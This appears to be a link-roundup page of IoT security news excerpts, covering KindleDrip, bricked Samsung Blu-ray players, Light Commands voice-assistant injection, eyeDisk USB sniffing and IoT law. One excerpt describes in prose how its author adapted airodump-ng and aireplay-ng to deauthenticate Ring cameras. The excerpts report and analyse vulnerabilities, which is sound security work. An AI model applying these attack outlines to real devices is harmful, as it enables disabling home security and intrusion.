KindleDrip — From Your Kindle’s Email Address to Using Your Credit Card
Some time ago, we noticed at Realmode Labs that Amazon Kindle has an interesting feature called “Send to Kindle”. This feature allows Kindle users to send e-books to their device as email attachments. We immediately thought of the potential security concerns of this feature: what if we can send malicious e-books to unsuspecting users?
Here's why your Samsung Blu-ray player bricked itself: It downloaded an XML config file that broke the firmware
This file, when fetched and saved to the device’s flash storage and processed by the equipment, crashed the system software and force a reboot. Upon reboot, the player parsed the XML file again from its flash storage, crashed and rebooted again. And so on, and so on, and so on. Crucially, the XML file would be parsed before a new one could be fetched from the internet, so once the bad configuration file was fetched and stored by these particular Samsung Blu-ray players in the field, they were bricked.
Greetings and salutations internet person! Have you ever pissed off a customer so much they bought a domain and stood up a website to shit on your asinine and boneheaded business practices? GE just did.
I just wanted a tall, cold, refreshing glass of water at 3am only to be greeted by a fucking atomic countdown on my trusty cold water and ice dispensing pal.
Vulnerabilities! We’ve got vulnerabilities here! … See? Nobody cares.
Jurassic Park is often (mistakenly) left out of the hacker movie canon. It clearly demonstrated the risk of an insider attack on control systems (Velociraptor rampage, amongst other tragedies…) nearly a decade ahead of the Maroochy sewage incident, it’s the first film I know of with a digital troll (“ah, ah, ah, you didn’t say the magic word!”), and Samuel L. Jackson correctly assesses the possible consequence of a hard reset (namely, everyone dying), resulting in his legendary “Hold on to your butts”. The quotable mayhem is seeded early in the film, when biotech spy Lewis Dodgson gives a sack of money to InGen’s Dennis Nedry to steal some dino DNA. Dodgson’s caricatured OPSEC (complete with trilby and dark glasses) is mocked by Nedry shouting, “Dodgson! Dodgson! We’ve got Dodgson here! See, nobody cares…” Three decades later, this quote still comes to mind* whenever conventional wisdom doesn’t seem to square with observed reality, and today we’re going to apply it to the oft-maligned world of Industrial Control System (ICS) security.
People Are Jailbreaking Used Teslas to Get the Features They Expect
Last week, Jalopnik ran an article about a person who bought a used Tesla from a dealer—who in turn bought it at auction directly from Tesla under California’s lemon law buyback program—advertised as having Autopilot, the company’s Advanced Driver Assistance System. The entire Autopilot package, which the car had when the dealer bought it, costs an extra $8,000. Then, Tesla remotely removed the software because “Full-Self Driving was not a feature that you had paid for.” Tesla said if the customer wanted Autopilot back, he’d have to fork over the $8,000.
I broke Giant’s handheld scanner system by only buying two things
The employee interface verified that my cart contained two (2) items. She scanned both. It verified that those two items were ones I had scanned. And then it told her that she needed to scan five more items to complete the audit, because the audit requires seven items to be scanned.
Wifi deauthentication attacks and home security
So, the attack is to simply monitor the network for any devices that fall into the address range you want to target, and then immediately start shooting deauthentication frames at them once you see one. I hacked airodump-ng to ignore all clients that didn’t look like a Ring, and then pasted in code from aireplay-ng to send deauthentication packets once it saw one. The problem here is that wifi cards can only be tuned to one frequency at a time, so unless you know the channel your potential target is on, you need to keep jumping between frequencies while looking for a target - and that means a target can potentially shoot off a notification while you’re looking at other frequencies.
Light Commands is a vulnerability of MEMS microphones that allows attackers to remotely inject inaudible and invisible commands into voice assistants, such as Google assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light.
In our paper we demonstrate this effect, successfully using light to inject malicious commands into several voice controlled devices such as smart speakers, tablets, and phones across large distances and through glass windows.
I tried to adjust the time on my alarm clock. I failed.
For some reason, my alarm clock requires that I install an app on my phone. And the app required me to create an account.
I’m going to repeat that: In order to set my alarm clock, I had to create an account with the clock manufacturer.
Samsung TVs should be regularly virus-checked, the company says
A how-to video on the Samsung Support USA Twitter account demonstrates the more than a dozen remote-control button presses required to access the sub-menu needed to activate the check. It suggested users should carry out the process “every few weeks” to “prevent malicious software attacks”.
eyeDisk. Hacking the unhackable. Again
So, a lot of complex SCSI commands were used to understand the controller side of the device, but obtaining the password/iris can be achieved by simply sniffing the USB traffic to get the password/hash in clear text. The software collects the password first, then validates the user-entered password BEFORE sending the unlock password. This is a very poor approach given the unhackable claims and fundamentally undermines the security of the device.
The company behind the $16,000 AI-powered laundry-folding robot has filed for bankruptcy
Backed by companies like Panasonic and Daiwa House, Laundroid had ambitious dreams to be the ultimate wardrobe organizer for the entire household. It had multiple cameras and robotic arms to scan a load of laundry, and used Wi-Fi to connect to a server that would analyze the clothing using AI to figure out the best way to fold it. A companion app was supposed to be able to track every piece of clothing that went through Laundroid, and categorize the clothes by household member. One load of laundry would take a couple hours to be folded, as each T-shirt took about five to ten minutes.
That’s how it was supposed to work in theory, anyway — when I tested it out at CES 2018 with my own T-shirt, the machine ate it up and Laundroid engineers had to work for about 15 minutes to pry it out. The explanation was that its cameras couldn’t recognize my black shirt, only the brightly colored demo shirts they’d prepared on hand.
IoT Security Bills Use Federal Spending as Leverage
The bill includes a number of separate provisions, but the one that stands to have the biggest potential effect on IoT security is the establishment of a set of standards for security in connected devices, standards that will be developed by the National Institute of Standards and Technology. The draft legislation doesn’t set out too many specifics for what those security standards would be, but dictates they will include four separate areas: secure development, identity management, patching, and configuration management. Under the language in the bill, vendors selling IoT devices to federal agencies will have to meet the NIST standards for those areas.
The Internet of Food
You know something you can’t get through the internet’s wires, at least not on its own? Food. We’ve been working on it for years, but no, we’re not at the point where we can deliver nourishment directly via the series of tubes. But food has always been something of a means to an end—a way of driving the internet forward, making it something people would actually like to use.
Plus tons of links.
We’ve performed the first announcement in this experiment yesterday,
and, despite the announcement being compliant with BGP standards, FRR
routers reset their sessions upon receiving it.
And then: https://mailman.nanog.org/pipermail/nanog/2019-January/099142.html
We have canceled this experiment permanently.
Everybody can relax. The internet is safe now.
CES 2019: A Show Report
On display this year was connectivity and integration for consumers based on about 10 years of incremental and sometimes hardly noticed baby steps. There are three big developments that are enabling the vast majority of scenarios on display at CES 2019:
Any screen/speaker can play any streaming media.
Any device can be turned on/off/controlled by voice.
Any device can have a radio and connect to any other device with a radio.
Fun times ahead.
Lots of pictures.
The curious case of the Raspberry Pi in the network closet
None of them knew anything about this so I asked my IT colleagues and they were as baffled as I was. I heard of people getting paid to put things like this in places they shouldn’t and for this reason I was very interested in finding out what it actually does.
The Internet of Unprofitable Things
Uncle Andrew wants to tell you a festive story. The NTPmare shortly after Christmas.
A look at home routers, and a surprising bug in Linux/MIPS
We reviewed 28 popular home routers for basic hardening features. None performed well. Oh, and we found a bug in the Linux/MIPS architecture.
California's bad IoT law
It’s based on the misconception of adding security features. It’s like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against.